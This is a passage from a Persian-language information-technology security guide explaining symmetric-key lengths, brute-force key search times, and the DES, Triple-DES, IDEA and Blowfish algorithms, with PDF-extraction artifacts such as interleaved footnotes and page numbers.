ﺷﻨﺎﺧﺘﻪ ﺷﺪﻩ ﻣﻘﺎﻭﻡ ﺑﺎﺷﺪ ﻫﻢ ﺍﻟﺰﺍﻣﹰﺎ ﺍﻳﻤﻦ ﻧﻴﺴﺖ ،ﭼﺮﺍﻛﻪ ﺑﻄﻮﺭ ﻣﺘﻮﺍﻟﻲ ﺍﻧﻮﺍﻉ ﺟﺪﻳﺪ ﺣﻤﻼﺕ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﻨﺪ.
ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺑﺮﺧﻲ ﺍﺯ ﺍﻓﺮﺍﺩ ﻳﺎ ﻣﺆﺳﺴﺎﺕ ﺍﺩﻋﺎ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ ﻛﻪ ﺍﻣﻨﻴﺖ ﺑﺴﻴﺎﺭ ﺯﻳـﺎﺩﺗﺮﻱ ﺍﺯ ﺍﻟﮕﻮﺭﻳﺘﻤﻬـﺎﻱ
ﻣﻮﺟﻮﺩ ﺩﺍﺭﻧﺪ ﺍﺑﺪﺍﻉ ﻛﺮﺩﻩﺍﻧﺪ .ﻋﻤﻮﻣﹰﺎ ﻧﺒﺎﻳﺪ ﺍﺯ ﺍﻳﻦ ﺍﺩﻋﺎﻫﺎ ﺯﻳﺎﺩ ﺍﺳﺘﻘﺒﺎﻝ ﻛﺮﺩ .ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺍﻣـﺮﻭﺯﻩ ﻫـﻴﭻ ﺣﻤﻠـﺔ ﺷـﻨﺎﺧﺘﻪ ﺷـﺪﻩﺍﻱ ﺩﺭ ﻣﻘﺎﺑـﻞ
ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻛﻪ ﺑﻄﻮﺭ ﮔﺴﺘﺮﺩﻩ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺑﺎﺷﺪ ،ﺩﻟﻴﻠﻲ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻛﻪ ﺍﺯ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺟﺪﻳـﺪ
ﻭ ﺁﺯﻣﻮﻥﻧﺸﺪﻩ -ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻳﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺍﺭﺍﻱ ﻧﻘﺎﻳﺺ ﭘﻨﻬﺎﻥ ﺑﺎﺷﻨﺪ -ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ.
ﻃﻮﻝ ﻛﻠﻴﺪ ﺩﺭ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﻣﺘﻘﺎﺭﻥ
ﻛﻠﻴﺪﻫﺎﻱ ﺑﺎ ﻃﻮﻝ ﻛﻢ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﻣﻨﻴﺖ ﭘﻴﺎﻣﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺑﻪ ﻣﻴﺰﺍﻥ ﺯﻳﺎﺩﻱ ﺧﺪﺷﻪﺩﺍﺭ ﻛﻨﻨﺪ ،ﺯﻳﺮﺍ ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﭘﻴـﺎﻡ ﺭﺍ ﺑـﺎ ﻫـﺮ
ﻛﻠﻴﺪ ﻣﻤﻜﻦ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﺪ ﺗﺎ ﻣﺤﺘﻮﺍﻱ ﭘﻴﺎﻡ ﺍﺳﺘﺨﺮﺍﺝ ﺷﻮﺩ .ﺍﻣﺎ ﺿﻤﻦ ﺍﻳﻨﻜﻪ ﻛﻠﻴﺪﻫﺎﻱ ﻛﻮﺗـﺎﻩ ﺍﻳﻤﻨـﻲ ﻧـﺴﺒﺘﹰﺎ ﻛﻤـﻲ ﻓـﺮﺍﻫﻢ ﻣـﻲﻛﻨﻨـﺪ،
ﻛﻠﻴﺪﻫﺎﻱ ﺑﺴﻴﺎﺭ ﻃﻮﻻﻧﻲ ﻫﻢ ﺩﺭ ﻋﻤﻞ ﻟﺰﻭﻣﹰﺎ ﺍﻣﻨﻴﺖ ﺑﺴﻴﺎﺭ ﺑﻴﺸﺘﺮﻱ ﺍﺯ ﻛﻠﻴﺪﻫﺎﻱ ﺑـﺎ ﻃـﻮﻝ ﻣﺘﻌـﺎﺩﻝ ﻓـﺮﺍﻫﻢ ﻧﻤـﻲﻧﻤﺎﻳﻨـﺪ .ﻳﻌﻨـﻲ ﻫﺮﭼﻨـﺪ
ﻛﻠﻴﺪﻫﺎﻱ ﺭﻣﺰ ۴۰ﺗﺎ ۵۶ﺑﻴﺘﻲ ﺍﻣﻨﻴﺖ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﻧﺪﺍﺭﻧﺪ ،ﻳﻚ ﻛﻠﻴﺪ ﺭﻣﺰ ۲۵۶ﺑﻴﺘﻲ ﺍﻣﻨﻴﺖ ﭼﻨﺎﻥ ﺯﻳﺎﺩﺗﺮﻱ ﺍﺯ ﻳـﻚ ﻛﻠﻴـﺪ ۱۶۸ﻳـﺎ ﺣﺘـﻲ
۱۲۸ﺑﻴﺘﻲ ﻓﺮﺍﻫﻢ ﻧﻤﻲﻛﻨﺪ.
ﺍﮔﺮ ﺗﻼﺵ ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﻳﻚ ﭘﻴﺎﻡ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﻴﺪ ﻭ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﻛﻠﻴﺪ ﺭﻣﺰ ﺭﺍ ﻧﺪﺍﺭﻳﺪ ،ﺁﺳﺎﻧﺘﺮﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﺭﻣﺰﮔـﺸﺎﻳﻲ ﭘﻴـﺎﻡ ﺍﻧﺠـﺎﻡ
ﻳﻚ ﺣﻤﻠﺔ brute forceﺍﺳﺖ .ﺍﻳﻦ ﺣﻤﻼﺕ ﻫﻤﭽﻨﻴﻦ "ﺣﻤﻼﺕ ﺟﺴﺘﺠﻮﻱ ﻛﻠﻴﺪ" ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﻧﺪ ،ﭼﻮﻥ ﻫﺮ ﻛﻠﻴـﺪ ﻣﻤﻜـﻦ ﺭﺍ ﺁﺯﻣـﺎﻳﺶ
ﻣﻲﻛﻨﻨﺪ ﺗﺎ ﻣﺸﺨﺺ ﺷﻮﺩ ﻛﻪ ﺁﻳﺎ ﺁﻥ ﻛﻠﻴﺪ ﭘﻴﺎﻡ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﻲﻛﻨﺪ ﻳﺎ ﻧﻪ .ﺍﮔﺮ ﻛﻠﻴﺪ ﺑﻄﻮﺭ ﺗﺼﺎﺩﻓﻲ ﺍﻧﺘﺨﺎﺏ ﺷـﻮﺩ ،ﺁﻧﮕـﺎﻩ ﻣﻬـﺎﺟﻢ ﺑﻄـﻮﺭ
ﻣﺘﻮﺳﻂ ﻧﻴﺎﺯ ﺩﺍﺭﺩ ﻛﻪ ﻧﺼﻒ ﻫﻤﺔ ﻛﻠﻴﺪﻫﺎﻱ ﺭﻣﺰ ﻣﻤﻜﻦ ﺭﺍ ﺑﺮﺍﻱ ﭘﻴﺪﺍ ﻛﺮﺩﻥ ﻛﻠﻴﺪ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻭﺍﻗﻌﻲ ﺁﺯﻣﺎﻳﺶ ﻧﻤﺎﻳﺪ.
ﻳﻚ ﻛﻠﻴﺪ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺩﺭ ﺩﺍﺧﻞ ﺭﺍﻳﺎﻧﻪ ﺑﺼﻮﺭﺕ ﻳﻚ ﺭﺷﺘﻪ ﺍﺭﻗﺎﻡ ﺩﻭﺩﻭﻳﻲ ٨١ﻧﻤﺎﻳﺶ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ .ﻫﺮﻋﺪﺩ ﺩﻭﺩﻭﻳﻲ ﻣﻲﺗﻮﺍﻧﺪ ۰ﻳﺎ ۱ﺑﺎﺷﺪ .ﺩﺭ
ﺣﺎﻟﺖ ﻛﻠﻲ ،ﻫﺮ ﺑﻴﺖ ﻛﻪ ﺑﻪ ﻛﻠﻴﺪ ﺭﻣﺰ ﺍﺿﺎﻓﻪ ﺷﻮﺩ ﺗﻌﺪﺍﺩ ﻛﻠﻴﺪﻫﺎ ﺭﺍ ﺩﻭﺑﺮﺍﺑﺮ ﻣﻲﻛﻨﺪ .ﻟﺬﺍ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﮐﻪ "ﭼﻪ ﺗﻌﺪﺍﺩ ﺑﻴﺖ ﺑﺮﺍﻱ ﺳـﺎﺧﺘﻦ ﻳـﻚ
ﻛﻠﻴﺪ ﺍﻳﻤﻦ ﻛﺎﻓﻲ ﺍﺳﺖ" ﺑﺴﺘﮕﻲ ﺑﻪ ﺍﻳﻦ ﺩﺍﺭﺩ ﻛﻪ ﻣﻬﺎﺟﻢ ﺑﺎ ﭼﻪ ﺳﺮﻋﺘﻲ ﺑﺘﻮﺍﻧﺪ ﻛﻠﻴﺪﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺭﺍ ﺁﺯﻣـﺎﻳﺶ ﻛﻨـﺪ ﻭ ﺷـﻤﺎ ﺑﺨﻮﺍﻫﻴـﺪ ﭼـﻪ
ﻣﺪﺗﻲ ﺍﻃﻼﻋﺎﺗﺘﺎﻥ ﺭﺍ ﺍﻳﻤﻦ ﻧﮕﻬﺪﺍﺭﻳﺪ .ﺍﮔﺮ ﻣﻬﺎﺟﻢ ﺑﺘﻮﺍﻧﺪ ۱۰ﻛﻠﻴﺪ ﺭﺍ ﺩﺭ ﻫﺮ ﺛﺎﻧﻴﻪ ﺁﺯﻣﺎﻳﺶ ﻛﻨﺪ ،ﺁﻧﮕﺎﻩ ﻳﻚ ﻛﻠﻴﺪ ۴۰ﺑﻴﺘـﻲ ﻣـﻲﺗﻮﺍﻧـﺪ ﻳـﻚ
ﭘﻴﺎﻡ ﺭﺍ ﺑﻴﺶ ﺍﺯ ۳۴۸۴ﺳﺎﻝ ﺣﻔﺎﻇﺖ ﻧﻤﺎﻳﺪ .ﺍﻟﺒﺘﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺍﻣﺮﻭﺯﻱ ﻣﻲﺗﻮﺍﻧﻨﺪ ﭼﻨﺪﻳﻦ ﻫﺰﺍﺭ ﻛﻠﻴـﺪ -ﻭ ﺑـﺎ ﺳـﺨﺖﺍﻓـﺰﺍﺭ ﻭ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ
ﻣﺨﺼﻮﺹ ،ﺻﺪﻫﺎ ﻫﺰﺍﺭ ﻛﻠﻴﺪ -ﺭﺍ ﺩﺭ ﺛﺎﻧﻴﻪ ﺁﺯﻣﺎﻳﺶ ﻛﻨﻨﺪ .ﺳﺮﻋﺖ ﺟﺴﺘﺠﻮﻱ ﻛﻠﻴﺪ ﻣﻲﺗﻮﺍﻧـﺪ ﺑـﺎ ﺍﺟـﺮﺍﻱ ﺑﺮﻧﺎﻣـﺔ ﻣـﺸﺎﺑﻪ ﺭﻭﻱ ﺻـﺪﻫﺎ ﻳـﺎ
ﻫﺰﺍﺭﺍﻥ ﺭﺍﻳﺎﻧﻪ ﺑﻄﻮﺭ ﻫﻤﺰﻣﺎﻥ ،ﺑﻴﺶ ﺍﺯ ﺍﻳﻦ ﻫﻢ ﺍﻓﺰﺍﻳﺶ ﻳﺎﺑﺪ .ﭘﺲ ﺑﺎ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺍﻣﺮﻭﺯﻱ ﺍﻣﻜﺎﻥ ﺑﺮﺭﺳﻲ ﺑﻴﺶ ﺍﺯ ﻳﻚ ﻣﻴﻠﻴﻮﻥ ﻛﻠﻴﺪ ﺩﺭ ﺛﺎﻧﻴﻪ
ﻫﻢ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﺍﺳﺖ.
ﺍﮔﺮ ﺗﻮﺍﻧﺎﻳﻲ ﺁﻧﺮﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻳﻚ ﻣﻴﻠﻴﻮﻥ ﻛﻠﻴﺪ ﺭﻣﺰ ﺭﺍ ﺩﺭ ﺛﺎﻧﻴﻪ ﺁﺯﻣﺎﻳﺶ ﻛﻨﻴﺪ ،ﻣﻲﺗﻮﺍﻧﻴﺪ ﺗﻤﺎﻡ ﻛﻠﻴﺪﻫﺎﻱ ۴۰ﺑﻴﺘـﻲ ﺭﺍ ﺩﺭ ﺗﻨﻬـﺎ ۱۳ﺭﻭﺯ
ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ .ﺍﮔﺮ ﻳﻚ ﻛﻠﻴﺪ ﺑﺎ ﻃﻮﻝ ۴۰ﺑﻴﺖ ﺑﻪ ﺍﻳﻦ ﺭﻭﺷﻨﻲ ﺑﺮﺍﻱ ﺍﻳﻤﻦ ﻧﮕﻪ ﺩﺍﺷﺘﻦ ﺍﻃﻼﻋﺎﺕ ﻛﺎﻓﻲ ﻧﺒﺎﺷﺪ ،ﺑﺮﺍﻱ ﻛﻠﻴﺪ ﺍﻳﻤﻦ ﭼﻨـﺪ ﺑﻴـﺖ
ﻻﺯﻡ ﺍﺳﺖ؟ ﺍﮔﺮ ﺑﺘﻮﺍﻧﻴﺪ ﻳﻚ ﻣﻴﻠﻴﺎﺭﺩ ﻛﻠﻴﺪ ﺭﺍ ﺩﺭ ﺛﺎﻧﻴﻪ ﺁﺯﻣﺎﻳﺶ ﻛﻨﻴﺪ ﺁﺯﻣﻮﺩﻥ ﻫﻤﺔ ﻛﻠﻴﺪﻫﺎﻱ ۸۰ﺑﻴﺘﻲ ﻫﻤﭽﻨﺎﻥ ﻣﺴﺘﻠﺰﻡ ۳۸ﻣﻴﻠﻴـﻮﻥ ﺳـﺎﻝ
ﺧﻮﺍﻫﺪ ﺑﻮﺩ .ﺁﺯﻣﻮﺩﻥ ﻳﻚ ﻛﻠﻴﺪ ۱۲۸ﺑﻴﺘﻲ ﺑﺎ ﻓﻨﺎﻭﺭﻱ ﺍﻣﺮﻭﺯﻱ ۱۰۲۲ﺳﺎﻝ ﻭ ﺣﺘﻲ ﺑﺎ ﭘﻴﺸﺮﻓﺘﻬﺎﻱ ﻣﺤﺎﺳﺒﺎﺕ ﻛﻮﺍﻧﺘﻤﻲ ﺻﺪﻫﺎ ﻣﻴﻠﻴـﻮﻥ ﺳـﺎﻝ
ﻻ ﻇﺮﻑ ۴ﻣﻴﻠﻴﺎﺭﺩ ﺳﺎﻝ ﺁﻳﻨﺪﻩ ﻗﺮﺍﺭ ﺍﺳﺖ ﺑﻪ ﻳﻚ ﻏﻮﻝ ﻗﺮﻣﺰ ﺁﺳﻤﺎﻧﻲ ﺗﺒﺪﻳﻞ ﺷﻮﺩ ﻭ
ﻧﻴﺎﺯ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ .ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻳﻨﻜﻪ ﺧﻮﺭﺷﻴﺪ ﻣﺎ ﺍﺣﺘﻤﺎ ﹰ
Binary Digits
81
٢٩٥
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺯﻣﻴﻦ ﺭﺍ ﻧﺎﺑﻮﺩ ﺧﻮﺍﻫﺪ ﻛﺮﺩ -ﻭ ﺑﺎ ﻓﺮﺽ ﺍﻳﻨﻜﻪ ﻫﻴﭽﮕﻮﻧﻪ ﺿﻌﻒ ﺩﻳﮕﺮﻱ ﺩﺭ ﺍﻟﮕﻮﺭﻳﺘﻤﻲ ﻛﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ -ﻳـﻚ
ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ۱۲۸ﺑﻴﺘﻲ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﺍﻏﻠﺐ ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﺎﻓﻲ ﺑﺎﺷﺪ!
ﺍﻟﮕﻮﺭﻳﺘﻢﻫﺎﻱ ﺭﺍﻳﺞ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ
ﺍﻣﺮﻭﺯﻩ ﺍﺯ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﺑﺴﻴﺎﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ .ﺑﺮﺧﻲ ﺍﺯ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺯﻣﻴﻨـﺔ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﺓ
٨٢
ﻼ ﺧﻼﺻﻪ ﺷﺪﻩﺍﻧﺪ.
ﺯﻳﺎﺩﻱ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﺫﻳ ﹰ
DES
٨٣
ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺍﺩﻩ ) (DESﻛﻪ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺩﻭﻟﺖ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺩﺭ ﺳﺎﻝ ۱۹۷۷ﻭ ﺑﺼﻮﺭﺕ ﻳﻚ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ANSIﺩﺭ
ﺳﺎﻝ ۱۹۸۱ﺍﻧﺘﺨﺎﺏ ﺷﺪ ،ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﻠﻮﮐﻲ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﻳﻚ ﻛﻠﻴﺪ ﺭﻣﺰ ۵۶ﺑﻴﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﻭ ﺑﺴﺘﻪ ﺑﻪ ﺍﻳﻨﻜﻪ ﺑـﻪ ﭼـﻪ
ﻣﻨﻈﻮﺭﻱ ﺑﻜﺎﺭ ﺭﻭﺩ ﺩﺍﺭﺍﻱ ﭼﻨﺪ ﺣﺎﻟﺖ ﻋﻤﻠﻜﺮﺩﻱ ﻣﺨﺘﻠﻒ ﻣﻲﺑﺎﺷﺪ DES .ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﻗﻮﻱ ﺍﺳﺖ ،ﺍﻣﺎ ﻃﻮﻝ ﻛﻠﻴﺪ ﻛﻮﺗﺎﻫﺶ ﻛﺎﺭﺑﺮﺩ ﺣﺎﻝ
ﺣﺎﺿﺮ ﺁﻧﺮﺍ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻩ ﺍﺳﺖ .ﺩﺭ ﺳﺎﻝ ۱۹۹۸ﻳـﻚ ﺩﺳـﺘﮕﺎﻩ ﺑـﺎ ﻫـﺪﻑ ﺍﺧﺘـﺼﺎﺻﻲ ﺷﻜـﺴﺘﻦ ﺭﻣـﺰ DESﺗﻮﺳـﻂ ﺑﻨﻴـﺎﺩ ﻃﻼﻳـﻪﺩﺍﺭﺍﻥ
ﺍﻟﻜﺘﺮﻭﻧﻴﻚ ) ٨٤(EFFﺑﺎ ﻫﺰﻳﻨﺔ ﻛﻤﺘﺮ ﺍﺯ ۲۵۰۰۰ﺩﻻﺭ ﺳﺎﺧﺘﻪ ﺷﺪ ﻭ ﺩﺭ ﻳﻚ ﻧﻤﺎﻳﺶ ﻋﻤﻮﻣﻲ ،ﻛﻠﻴﺪ ﺭﻣـﺰ ﻳـﻚ ﭘﻴـﺎﻡ ﺭﻣﺰﮔـﺬﺍﺭﻱﺷـﺪﻩ ﺭﺍ ﺩﺭ
ﻛﻤﺘﺮ ﺍﺯ ﻳﻚ ﺭﻭﺯ ﺩﺭ ﺑﺮﺍﺑﺮ ﭼﺸﻤﺎﻥ ﺍﻋﻀﺎﻱ ﺍﺋﺘﻼﻑ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍﻳﺎﻧﻪ ﺍﺯ ﺳﺮﺍﺳﺮ ﺩﻧﻴﺎ ﭘﻴﺪﺍ ﻛﺮﺩ.
DESﺳﻪﮔﺎﻧﻪ
٨٥
DESﺳﻪﮔﺎﻧﻪ ﺭﻭﺷﻲ ﺍﺳﺖ ﻛﻪ ﺑﺎ ﺳﻪ ﺑﺎﺭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ DESﻭ ﺳﻪ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻔﺎﻭﺕ ﻛﻪ ﺟﻤﻌﹰﺎ ﻃﻮﻝ ﻛﻠﻴﺪ ﺭﻣﺰ ﺭﺍ ﺑـﻪ
۱۶۸ﺑﻴﺖ ﻣﻲﺭﺳﺎﻧﺪ DES ،ﺭﺍ ﺑﻄﻮﺭ ﭼﺸﻤﮕﻴﺮﻱ ﺍﻳﻤﻦﺗﺮ ﻣﻲﻛﻨﺪ .ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻢ ﻛﻪ ﻫﻤﭽﻨـﻴﻦ ﺑـﻪ " "3DESﻣﻮﺳـﻮﻡ ﺍﺳـﺖ ﺩﺭ ﻣﻘﻴـﺎﺱ
ﻭﺳﻴﻌﻲ ﺗﻮﺳﻂ ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ ﻭ ﻧﻴﺰ ﺗﻮﺳﻂ ﭘﻮﺳﺘﺔ ﺍﻣﻦ ) ٨٦(SSHﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺍﺳﺖ .ﺍﺯ ﻟﺤﺎﻅ ﻧﻈﺮﻱ ،ﺩﻭﺑﺎﺭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ DESﺑﺎ ﺩﻭ ﻛﻠﻴﺪ
ﺭﻣﺰ ﻣﺘﻔﺎﻭﺕ ،ﺑﺪﻟﻴﻞ ﻳﻚ ﺣﻤﻠﺔ ﻣﺘﻦﺳﺎﺩﺓ ﺷﻨﺎﺧﺘﻪ ﺷﺪﻩ ﻣﻮﺳﻮﻡ ﺑﻪ ﺭﻭﻳﺎﺭﻭﻳﻲ ﺩﺭ ﻣﻴﺎﻥ - ٨٧ﻛﻪ ﺩﺭ ﺁﻥ ﻣﻬﺎﺟﻢ ﻫﻤﺰﻣـﺎﻥ ﻛﻮﺷـﺶ ﻣـﻲﻛﻨـﺪ
ﻣﺘﻦ ﻣﻌﻤﻮﻟﻲ ﺭﺍ ﺑﺎ ﻳﻚ ﻋﻤﻠﻴﺎﺕ DESﻳﮕﺎﻧﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻭ ﻣﺘﻦ ﭘﻴﺎﻡ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺑﺎ ﻳﻚ ﻋﻤﻠﻴﺎﺕ DESﻳﮕﺎﻧـﺔ ﺩﻳﮕـﺮ ﺭﻣﺰﮔـﺸﺎﻳﻲ
ﻛﻨﺪ ﺗﺎ ﺩﺭ ﺁﻥ ﻣﻴﺎﻥ ﻳﻚ ﺗﻄﺎﺑﻖ ﭘﻴﺪﺍ ﺷﻮﺩ -ﺁﻧﻘﺪﺭ ﻛﻪ ﺩﺭ ﺍﺑﺘﺪﺍ ﺍﻧﺘﻈﺎﺭ ﺁﻥ ﻣﻲﺭﻭﺩ ﺍﻣﻨﻴﺖ ﺭﺍ ﺑﻬﺒﻮﺩ ﻧﻤﻲﺑﺨﺸﺪ.
BlowFish
٨٨
IDEA
٨٩
٩٠
٩١
ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺩﺍﺩﻩ ) (IDEAﺩﺭ ﺯﻭﺭﻳﺦ ﺳﻮﺋﻴﺲ ﺗﻮﺳﻂ ﺟﻴﻤﺰ ﺍﻝ ﻣﺎﺳﻲ ﻭ ﺯﻭﺟﻴﺎ ﻻﻱ ﭘﺪﻳـﺪ ﺁﻣﺪﻧـﺪ ﻭ ﺩﺭ ﺳـﺎﻝ
۱۹۹۰ﻋﻤﻮﻣﻲ ﺷﺪﻧﺪ IDEA .ﺍﺯ ﻳﻚ ﻛﻠﻴﺪ ۱۲۸ﺑﻴﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﻭ ﺩﺭ ﺑﺮﻧﺎﻣﺔ ﻣﺸﻬﻮﺭ PGPﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻓﺎﻳﻠﻬـﺎ ﻭ ﻧﺎﻣـﻪﻫـﺎﻱ
۸۲
ﻓﻬﺮﺳﺖ ﻛﺎﻣﻠﺘﺮﻱ ﺍﺯ ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﺩﺭ ﺻﻔﺤﺎﺕ ۱۶۹ﺗﺎ ۱۷۶ﮐﺘﺎﺏ " (PUIS) "Practical Unix & Internet Securityﺍﻧﺘﺸﺎﺭﺍﺕ ﺍﻭﺭﻳﻠﻲ ﺁﻣﺪﻩ ﺍﺳﺖ.
Data Encryption Standard
Electronic Frontier Foundation
Triple-DES
Secure Shell
Meet in the Middle
Bruce Schnier
International Data Encryption Algorithms
James L. Massey
Xuejia Lai
83
84
85
86
87
88
89
90
91
ﺑﺨﺶ ﭘﻨﺠﻢ
BlowFishﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺑﻠﻮﻛﻲ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺳﺮﻳﻊ ،ﺟﻤﻊ ﻭ ﺟﻮﺭ ،ﻭ ﺳﺎﺩﻩ ﺍﺳﺖ ﻛﻪ ﺗﻮﺳﻂ ﺑﺮﻭﺱ ﺷـﻨﻴﺮ ﺍﺑـﺪﺍﻉ ﺷـﺪ .ﺍﻟﮕـﻮﺭﻳﺘﻢ ﺩﺍﺭﺍﻱ
ﻳﻚ ﻛﻠﻴﺪ ﺭﻣﺰ ﺑﺎ ﻃﻮﻝ ﻣﺘﻐﻴﻴﺮ ﺍﺳﺖ ﻛﻪ ﺣﺪﺍﻛﺜﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺗﺎ ۴۴۸ﺑﻴﺖ ﺑﺮﺳـﺪ ،ﻭ ﺑـﺮﺍﻱ ﺍﺟـﺮﺍ ﺭﻭﻱ ﭘﺮﺩﺍﺯﺷـﮕﺮﻫﺎﻱ ۳۲ﺑﻴﺘـﻲ ﻭ ۶۴ﺑﻴﺘـﻲ
ﺑﻬﻴﻨﻪﺳﺎﺯﻱ ﺷﺪﻩ ﺍﺳﺖ .ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺍﺯ ﺍﻧﺤﺼﺎﺭ ﺩﺭ ﺁﻣﺪﻩ ﻭ ﺩﺭ ﺣﻮﺯﺓ ﻣﺼﺮﻑ ﻫﻤﮕﺎﻧﻲ ﻗﺮﺍﺭ ﮔﺮﻓﺘـﻪ ﺍﺳـﺖ BlowFish .ﺩﺭ
ﭘﻮﺳﺘﺔ ﺍﻳﻤﻦ ﻭ ﺳﺎﻳﺮ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺸﺎﺑﻪ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ.
٢٩٦
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
